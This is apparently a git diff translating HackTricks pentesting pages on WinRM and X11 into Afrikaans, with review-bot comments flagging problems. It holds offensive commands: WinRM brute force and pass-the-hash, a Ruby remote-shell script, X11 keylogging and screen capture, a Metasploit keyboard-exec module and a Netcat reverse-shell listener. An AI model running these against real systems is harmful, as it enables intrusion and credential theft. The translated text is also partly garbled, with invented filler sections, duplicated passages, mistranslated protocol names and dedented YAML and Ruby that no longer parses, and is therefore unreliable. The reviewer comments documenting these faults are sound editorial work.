Restoring sessions - -This **won't work** if the the **language** is **constrained** in the remote computer. - +Dit **sal nie werk** as die **taal** beperk is op die afgeleë rekenaar nie. ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force 
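Review bot: the heading `+### **WinRM Oop Forseer**` is an unnatural calque of "Forcing WinRM Open"; "Forseer WinRM oop" or "WinRM oopforseer" reads better. The `# Save session in var` comment line inside the powershell block is removed and re-added without any visible change, so this is another whitespace-only code-block edit that should not be part of a translation commit.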
@@ -154,47 +152,41 @@ $sess1 = New-PSSession -ComputerName [-SessionOption (New-PSSessi #And restore it at any moment doing Enter-PSSession -Session $sess1 ``` - -Inside this sessions you can load PS scripts using _Invoke-Command_ - +Binne hierdie sessies kan jy PS-skripte laai deur gebruik te maak van _Invoke-Command_. ```powershell Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` +### Foute -### Errors +As jy die volgende fout vind: -If you find the following error: - -`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.` - -The try on the client (info from [here](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)): +`enter-pssession : Verbinding met afgeleë bediener 10.10.10.175 het misluk met die volgende foutboodskap: Die WinRM-kliënt kan nie die versoek verwerk nie. As die verifikasieskema verskil van Kerberos, of as die kliëntrekenaar nie by 'n domein aangesluit is nie, moet HTTPS-vervoer gebruik word of die bestemmingsmasjien moet by die TrustedHosts-konfigurasie-instelling gevoeg word. Gebruik winrm.cmd om TrustedHosts te konfigureer. Let daarop dat rekenaars in die TrustedHosts-lys nie noodwendig geverifieer word nie. Jy kan meer inligting daaroor kry deur die volgende opdrag uit te voer: winrm help config. 
Vir meer inligting, sien die about_Remote_Troubleshooting Help-onderwerp.` +Probeer die volgende op die kliënt (inligting van [hier](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)): ```ruby winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagte wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## WinRM connection in linux +## WinRM-verbinding in Linux ### Brute Force -Be careful, brute-forcing winrm could block users. - +Wees versigtig, brute force-aanvalle op WinRM kan gebruikers blokkeer. ```ruby #Brute force crackmapexec winrm -d -u usernames.txt -p passwords.txt 
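Review bot: the WinRM error text in the `enter-pssession : ...` code span is translated, but it is quoted program output that readers need to match against what their client prints, so keep the English message verbatim (`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. ...`) and translate only the surrounding sentences. Pre-existing but visible here: the `winrm quickconfig` / `winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'` block is fenced as ```ruby although these are Windows shell commands; ```powershell or ```cmd is the right tag.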
@@ -206,41 +198,68 @@ crackmapexec winrm -d -u -p -x "whoami" crackmapexec winrm -d -u -H -X '$PSVersionTable' #Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm ``` +### Gebruik van evil-winrm -### Using evil-winrm +`evil-winrm` is 'n nuttige hulpmiddel wat gebruik kan word vir die pentesting van Windows Remote Management (WinRM)-dienste. Hierdie hulpmiddel maak dit moontlik om aan te meld by 'n Windows-masjien en uitvoering van verskeie operasies uit te voer, soos die verkryging van inligting, uitvoering van opdragte en die oplaai van lêers. +Om `evil-winrm` te gebruik, volg die volgende stappe: + +1. Installeer die `evil-winrm`-hulpmiddel op jou stelsel. +2. Voer die volgende opdrag in om aan te meld by die doelwitstelsel: `evil-winrm -i -u -p `. +3. As die aanmelding suksesvol is, sal jy 'n interaktiewe skootrekenaar ontvang waar jy opdragte kan uitvoer. +4. Gebruik die verskillende opdragte om inligting te verkry, lêers op te laai of uit te voer, en ander operasies uit te voer. + +Dit is belangrik om te onthou dat die gebruik van `evil-winrm` slegs toegelaat word op stelsels waarvoor jy die regte toestemming het om dit te doen. Wees verantwoordelik en gebruik hierdie hulpmiddel slegs vir wettige doeleindes. ```ruby gem install evil-winrm ``` - -Read **documentation** on its github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) - +Lees die **dokumentasie** op sy github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) ```ruby evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i / ``` +Om evil-winrm te gebruik om aan te sluit by 'n IPv6-adres, skep 'n inskrywing binne **/etc/hosts** wat 'n domeinnaam aan die IPv6-adres koppel en maak verbinding met daardie domein. 
-To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/etc/hosts**_ setting a **domain name** to the IPv6 address and connect to that domain. - -### Pass the hash with evil-winrm - +### Gee die has met evil-winrm deur ```ruby evil-winrm -u -H -i ``` - ![](<../.gitbook/assets/image (173).png>) -### Using a PS-docker machine +### Die gebruik van 'n PS-docker masjien +Om WinRM te pentest, kan jy 'n PS-docker masjien gebruik om 'n omgewing te skep waarin jy die tegniek kan toets. Hier is die stappe om dit te doen: + +1. Skep 'n nuwe PS-docker masjien deur die volgende opdrag uit te voer: + ```plaintext + docker run -it --name winrm-test -p 5985:5985 -p 5986:5986 mcr.microsoft.com/windows/servercore:ltsc2019 powershell + ``` + +2. Maak 'n nuwe PowerShell-sessie met die WinRM-module: + ```plaintext + $session = New-PSSession -ComputerName -Port -Credential + ``` + +3. Maak 'n nuwe sessie met die WinRM-module: + ```plaintext + Enter-PSSession -Session $session + ``` + +4. Jy is nou in 'n interaktiewe PowerShell-sessie op die doelwitbediener. Jy kan verskillende WinRM-opdragte uitvoer om die omgewing te toets en te pentest. + +5. As jy klaar is, kan jy die PS-docker masjien verwyder deur die volgende opdrag uit te voer: + ```plaintext + docker rm winrm-test -f + ``` + +Deur hierdie stappe te volg, kan jy 'n PS-docker masjien gebruik om WinRM te pentest en die veiligheid van die omgewing te evalueer. ``` docker run -it quickbreach/powershell-ntlm $creds = Get-Credential Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds ``` +### Gebruik 'n ruby-skrips -### Using a ruby script - -**Code extracted from here: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)** - +**Kode onttrek van hier: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)** ```ruby require 'winrm-fs' 
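Review bot: the `evil-winrm` introduction with its four-step list and closing responsibility paragraph, and the five-step `PS-docker masjien` procedure (`docker run -it --name winrm-test ... mcr.microsoft.com/windows/servercore:ltsc2019 powershell`, `docker rm winrm-test -f`), have no counterpart in the removed English lines; they are generated filler, and the docker steps name a different image from the page's own `docker run -it quickbreach/powershell-ntlm` command that still follows them. Drop the generated text and translate only the original sentences. Smaller points: `### Gee die has met evil-winrm deur` should read `hash`; `### Gebruik 'n ruby-skrips` should be `ruby-skrip`; and the screenshot `![](<../.gitbook/assets/image (173).png>)` is removed without replacement.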
@@ -250,22 +269,22 @@ require 'winrm-fs' # https://alamot.github.io/winrm_shell/ -conn = WinRM::Connection.new( - endpoint: 'https://IP:PORT/wsman', - transport: :ssl, - user: 'username', - password: 'password', - :no_ssl_peer_verification => true +conn = WinRM::Connection.new( +endpoint: 'https://IP:PORT/wsman', +transport: :ssl, +user: 'username', +password: 'password', +:no_ssl_peer_verification => true ) class String - def tokenize - self. - split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). - select {|s| not s.empty? }. - map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} - end +def tokenize +self. +split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). +select {|s| not s.empty? }. +map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} +end end 
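Review bot: the leading indentation of the Ruby snippet is stripped (`-   endpoint: 'https://IP:PORT/wsman'` becomes `+endpoint: 'https://IP:PORT/wsman'`, and the `def tokenize` body is flattened to column 0); nothing in this block needs translating, so leave it byte-identical to the source. Ruby still parses the dedented form, but it hides the class/method structure and makes the diff look like a code change when it is not.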
@@ -274,101 +293,96 @@ file_manager = WinRM::FS::FileManager.new(conn) conn.shell(:powershell) do |shell| - until command == "exit\n" do - output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") - print(output.output.chomp) - command = gets - if command.start_with?('UPLOAD') then - upload_command = command.tokenize - print("Uploading " + upload_command[1] + " to " + upload_command[2]) - file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path| - puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") - end - command = "echo `nOK`n" - end - output = shell.run(command) do |stdout, stderr| - STDOUT.print(stdout) - STDERR.print(stderr) - end - end - puts("Exiting with code #{output.exitcode}") +until command == "exit\n" do +output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") +print(output.output.chomp) +command = gets +if command.start_with?('UPLOAD') then +upload_command = command.tokenize +print("Uploading " + upload_command[1] + " to " + upload_command[2]) +file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path| +puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") +end +command = "echo `nOK`n" +end +output = shell.run(command) do |stdout, stderr| +STDOUT.print(stdout) +STDERR.print(stderr) +end +end +puts("Exiting with code #{output.exitcode}") end ``` - ## Shodan * `port:5985 Microsoft-HTTPAPI` -## References +## Verwysings * [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: WinRM #Protocol Abbreviation if there is one. Port_Number: 5985 #Comma separated if there is more than one. 
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for WinRM - Note: | - Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. +Name: Notes +Description: Notes for WinRM +Note: | +Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. - sudo gem install winrm winrm-fs colorize stringio - git clone https://github.com/Hackplayers/evil-winrm.git - cd evil-winrm - ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ +sudo gem install winrm winrm-fs colorize stringio +git clone https://github.com/Hackplayers/evil-winrm.git +cd evil-winrm +ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ - https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/ +https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/ - ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/ - ^^so you can upload binary's from that directory or -s to upload scripts (sherlock) - menu - invoke-binary `tab` +ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' 
-e /root/Desktop/Machines/HTB/Resolute/ +^^so you can upload binary's from that directory or -s to upload scripts (sherlock) +menu +invoke-binary `tab` - #python3 - import winrm - s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret')) - print(s.run_cmd('ipconfig')) - print(s.run_ps('ipconfig')) +#python3 +import winrm +s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret')) +print(s.run_cmd('ipconfig')) +print(s.run_ps('ipconfig')) - https://book.hacktricks.xyz/pentesting/pentesting-winrm +https://book.hacktricks.xyz/pentesting/pentesting-winrm Entry_2: - Name: Hydra Brute Force - Description: Need User - Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} +Name: Hydra Brute Force +Description: Need User +Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} ``` - -​ -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
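Review bot: the `HackTricks Automatic Commands` block is YAML, and this hunk removes the indentation under `Entry_1:` and `Entry_2:` (`-  Name: Notes` becomes `+Name: Notes`, and everything under `Note: |` is flattened to column 0). A block scalar `Note: |` followed by unindented lines no longer parses, and `Name`/`Description`/`Command` become top-level keys instead of children of the entries, so tooling that consumes these blocks will break; restore the original indentation. The same dedent is applied to the Ruby `conn.shell(:powershell) do |shell|` loop, which should also stay as in the source. Pre-existing but worth fixing while here: `Protocol_Description: Windows Remote Managment` is missing an `e`.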
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 1407263ab..309e0b4bd 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -2,57 +2,52 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment. - -**Default port:** 6000 +**X Window System** (X) is 'n veelsydige venstersisteem wat algemeen voorkom op UNIX-gebaseerde bedryfstelsels. Dit bied 'n raamwerk vir die skep van grafiese **gebruikerskoppelvlakke (GUI's)**, met individuele programme wat die gebruikerskoppelvlakontwerp hanteer. Hierdie buigsaamheid maak diverse en aanpasbare ervarings binne die X-omgewing moontlik. 
+**Verstekpoort:** 6000 ``` PORT STATE SERVICE 6000/tcp open X11 ``` +## Opname -## Enumeration - -Check for **anonymous connection:** - +Kyk vir **anonieme verbinding:** ```bash nmap -sV --script x11-access -p msf> use auxiliary/scanner/x11/open_x11 ``` +#### Plaaslike Opsomming -#### Local Enumeration - -The file **`.Xauthority`** in the users home folder is **used** by **X11 for authorization**. From [**here**](https://stackoverflow.com/a/37367518): - +Die lêer **`.Xauthority`** in die gebruiker se tuisskyf word **gebruik** deur **X11 vir outorisasie**. Van [**hier**](https://stackoverflow.com/a/37367518): ```bash $ xxd ~/.Xauthority 00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M 
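Review bot: "Enumeration" is translated two different ways within this hunk (`## Opname` and `#### Plaaslike Opsomming`) and a third way in the next one (`#### Plaaslike Enumerasie-sessie`); pick one term and use it for every heading in the file. Also `tuisskyf` in `Die lêer **`.Xauthority`** in die gebruiker se tuisskyf` means home disk; the source says home folder, so `tuisgids` is the right word.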
@@ -60,36 +55,41 @@ $ xxd ~/.Xauthority 00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X 00000030: 041d ef ... ``` - -> MIT-magic-cookie-1: Generating 128bit of key (“cookie”), storing it in \~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie” and if so, the connection is permitted. the key is generated by DMX. +> MIT-towenaar-koekie-1: Genereer 128-bits sleutel ("koekie"), stoor dit in \~/.Xauthority (of waar die XAUTHORITY envvar na verwys). Die kliënt stuur dit plain na die bediener! Die bediener kontroleer of dit 'n kopie van hierdie "koekie" het en as dit wel die geval is, word die verbinding toegelaat. Die sleutel word gegenereer deur DMX. {% hint style="warning" %} -In order to **use the cookie** you should set the env var: **`export XAUTHORITY=/path/to/.Xauthority`** +Om die koekie te **gebruik**, moet jy die env-var stel: **`export XAUTHORITY=/pad/na/.Xauthority`** {% endhint %} -#### Local Enumeration Session - +#### Plaaslike Enumerasie-sessie ```bash -$ w - 23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 +$ w +23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session ``` -In the example, `localhost:0` was running xfce4-session. +## Verifieer Verbinding -## Verfy Connection +To verify the X11 connection, you can use the `xeyes` command. This command opens a small window with a pair of eyes that follow the mouse cursor. +Om die X11-verbinding te verifieer, kan jy die `xeyes`-opdrag gebruik. Hierdie opdrag open 'n klein venster met 'n paar oë wat die muisaanwyser volg. + +```bash +$ xeyes +``` + +If the eyes appear on your screen, it means that the X11 connection is working properly. + +As die oë op jou skerm verskyn, beteken dit dat die X11-verbinding korrek werk. 
```bash xdpyinfo -display : xwininfo -root -tree -display : #Ex: xwininfo -root -tree -display 10.5.5.12:0 ``` +## Sleutelloggin -## Keyloggin - -[xspy](http://tools.kali.org/sniffingspoofing/xspy) to sniff the keyboard keystrokes. - -Sample Output: +[xspy](http://tools.kali.org/sniffingspoofing/xspy) om die sleutelbordtoetse te snuif. +Voorbeelduitset: ``` xspy 10.9.xx.xx 
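Review bot: `MIT-magic-cookie-1` in the quoted paragraph is the name of the X11 authorization protocol (MIT-MAGIC-COOKIE-1) and must not be translated; `MIT-towenaar-koekie-1` will not match what readers see in `xauth list` output or server error messages. In the same hunk the `xeyes` section is new material not present in the removed lines, and it appears twice, once in English (`To verify the X11 connection, you can use the `xeyes` command...`, `If the eyes appear on your screen...`) and once in Afrikaans; drop the English duplicates or the whole insertion. The sentence `In the example, `localhost:0` was running xfce4-session.` is removed without a translation, and the `$ w` output loses its leading space (`+23:50:48 up 1 day...`), which misaligns the columns. Minor: `## Sleutelloggin` should be `Sleutellogging` or keep `Keylogging`.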
@@ -97,26 +97,54 @@ opened 10.9.xx.xx:0 for snoopng swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123 qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab ``` +## Skermskote vaslegging -## Screenshots capturing +Skermskote vaslegging is 'n tegniek wat gebruik word om visuele inligting van 'n X11-sessie vas te lê. Dit kan gebruik word tydens pentesting om toegang tot die skerm van 'n gebruiker te verkry en sensitiewe inligting te onderskep. +### X11-sessies + +X11 is 'n protokol wat gebruik word vir die vertoon van grafiese gebruikerskoppelvlakke op Unix-gebaseerde stelsels. Dit maak gebruik van 'n klient-bedienersmodel, waar die X-server die skerm vertoon en die X-kliënt programme gebruik om die vertooning te beheer. + +### Skermskote vasleggingstegnieke + +Daar is verskeie tegnieke wat gebruik kan word om skermskote vas te lê in 'n X11-sessie. Hier is 'n paar voorbeelde: + +1. **xwd**: Die xwd-opdrag kan gebruik word om 'n skermskoot van 'n X11-sessie te neem en dit na 'n lêer te stuur. Byvoorbeeld: + + ``` + xwd -root -out screenshot.xwd + ``` + +2. **xwdtopnm**: Die xwdtopnm-hulpprogramma kan gebruik word om 'n xwd-lêer na 'n draagbare gryskaartformaat (PNM) om te skakel. Byvoorbeeld: + + ``` + xwdtopnm screenshot.xwd > screenshot.pnm + ``` + +3. **convert**: Die convert-opdrag van die ImageMagick-pakket kan gebruik word om 'n skermskoot na 'n ander formaat, soos JPEG of PNG, om te skakel. Byvoorbeeld: + + ``` + convert screenshot.pnm screenshot.jpg + ``` + +### Gebruik van skermskote vaslegging in pentesting + +By die uitvoering van 'n pentest, kan skermskote vaslegging gebruik word om toegang tot die skerm van 'n gebruiker te verkry en potensiële kwesbaarhede te identifiseer. Dit kan ook gebruik word om inligting soos wagwoorde, persoonlike inligting en ander sensitiewe data te onderskep. 
+ +Dit is belangrik om etiese hackingpraktyke te volg en slegs skermskote vas te lê met die toestemming van die eienaar van die stelsel. ```bash xwd -root -screen -silent -display > screenshot.xwd convert screenshot.xwd screenshot.png ``` +## Afstandskantoor Aansig -## Remote Desktop View - -Way from: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) - +Bron: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) ``` ./xrdp.py ``` +Weg van: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) -Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) - -First we need to find the ID of the window using xwininfo - +Eerst moet ons die ID van die venster vind deur xwininfo te gebruik. ``` xwininfo -root -display 10.9.xx.xx:0 
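Review bot: the `### X11-sessies`, `### Skermskote vasleggingstegnieke` (xwd / xwdtopnm / convert steps) and `### Gebruik van skermskote vaslegging in pentesting` subsections, plus the ethics paragraph, have no counterpart in the removed English lines; the source has only the heading `## Screenshots capturing` and the `xwd -root -screen -silent -display > screenshot.xwd` block that still follows, so remove the generated text. Also `## Afstandskantoor Aansig` mistranslates "Remote Desktop View" (it reads "remote office view"); `## Afstandslessenaar-aansig` or keeping "Remote Desktop" would be clearer. `Way from:` is rendered inconsistently as `Bron:` for the first link and `Weg van:` for the second, and `Eerst moet ons` should be `Eers moet ons`.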
@@ -143,42 +171,35 @@ Override Redirect State: no Corners: +0+0 -0+0 -0-0 +0-0 -geometry 1024x768+0+0 ``` - **XWatchwin** -For **live viewing** we need to use - +Vir **lewende siening** moet ons gebruik maak van ```bash ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo ./xwatchwin 10.9.xx.xx:0 -w 0x45 ``` +## Kry Skulp -## Get Shell - +Om 'n skulp te kry ``` msf> use exploit/unix/x11/x11_keyboard_exec ``` +Ander manier: -Other way: - -**Reverse Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command: - +**Omgekeerde Skulp:** Xrdp maak dit ook moontlik om 'n omgekeerde skulp te gebruik deur middel van Netcat. Tik die volgende bevel in: ```bash ./xrdp.py \ –no-disp ``` +In die koppelvlak kan jy die **R-shell opsie** sien. -In the interface you can see the **R-shell option**. - -Then, start a **Netcat listener** in your local system on port 5555. - +Begin dan 'n **Netcat luisteraar** in jou plaaslike stelsel op poort 5555. ```bash nc -lvp 5555 ``` - -Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell +Plaas dan jou IP-adres en poort in die **R-Shell** opsie en klik op **R-shell** om 'n skulp te kry -## References +## Verwysings * [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) @@ -189,29 +210,29 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh
